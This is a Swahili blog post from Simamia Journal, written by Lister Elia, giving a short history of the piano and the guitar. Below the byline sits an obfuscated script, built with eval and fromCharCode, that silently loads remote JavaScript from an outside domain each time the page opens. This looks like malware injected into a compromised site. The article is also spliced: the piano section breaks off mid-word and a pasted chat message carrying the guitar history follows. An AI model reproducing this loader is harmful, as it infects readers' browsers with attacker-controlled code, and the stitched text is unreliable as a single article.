Recent Comments

HISTORIA YA KINANDA CHA PIANO KWA UFUPI

By Simamia Journal May 2, 2021
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
 Imeandikwa na Lister Elia(www.listerelia.com)
Kinanda ni chombo muhimu sana katika tasnia ya muziki na kimekuwa chachu katika kukonga nyoyo za wapenda muziki duniani kote,si kwa miongo tu bali kwa karne kadhaa sasa.
Je,unamjua Inventor au mtengenezaji/mvumbuzi wa chombo hiki maalum?!.
Si mwingine bali ni Bartolomeo Cristofori,mzaliwa wa Padua Italy.. alizaliwa mwaka 1655 na akafariki mwaka wa 1731.
Kijana Bartolomeo Cristofori katika ubora wake binafsi,bila msaada wala mchango wa mawazo ya mtu mwingine… nisisitize kwa lugha ya kukopa(single handedly)alifanya ubunifu huo ambao duniani iliukubali kwa kukipokea chombo hicho chenye sound tamu kwa mikono miwili na kikabadilisha uwepo wa muziki kutokana mchango wa sou…
[9:28 PM, 5/2/2021] Lister Eliah L E: Historia fupi ya Gitaa:-
Anaandika Lister Elia.
www.listerelia.com
Italia ni nchi ambayo imekuwa chachu ya msambao wa vyombo vingi vya muziki vilivyo katika uso wa dunia hii leo.
Nimewahi kuiandika historia ya kinanda na kama uliifuatilia vizuri,utakumbuka kwamba,mvumbuzi wa chombo hicho ni mu-Italiano kutoka mji wa Padua.
Kama kilivyo kinanda,gitaa pia mvumbuzi wake ni wa huko huko Italia,kwa jina akijukana kama Gaetano Vinaccia kutoka mji wa Naples.
Historia inaonesha ni mambo machache sana yanayojulikana kumhusu Vinaccia ila inasadikiwa kwamba,aliishi kati ya mwaka 1759 na 1831 huko Naples Italia na hakukuwa na habari zozote zilizohakiki kifo chake kilitolea lini,wapi na kwanini.
Gaetano Vinaccia ndiye mvumbuzi wa gitaa ambaye dunia ilimkubali na kuweka jina lake katika kumbukubu za vitabu vya historia duniani.
“Hili gitaa la nyuzi sita tunaloliona leo,likihanikizwa na wapiga magitaa wengi ilikuwa ni uvumbuzi wa Gaetano Vinaccia.
Gitaa hili la nyuzi 6 lilianza kusambaa barani Ulaya,hasa Ufaransa,Hispania na hukohuko Italia kwenye kati ya miaka ya 1790 hadi 1830,kabla ya kusambaa duniani kote”.
Hivyo basi gitaa ni chombo cha kale kilichoburudisha watu wa kale na kinaendelea kutuburudiasha sisi wa leo,na hakuna dalili ya kupotea kwacho leo,kesho,keshokutwa,mtondo ~goo,achilia mbali karne zijazo.
Shukrani sana kwa walionitengea muda wao kidogo,kusoma maandiko haya.
………………………………………..
Karibu sana Lister Eliah.
www.simamia.com na Simamia TV tunakukaribisha kwa mikono yote. Tembelea You Tube, andika Simamia TV subscribe chanel yetu uwe wa kwanza kupata habari.

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv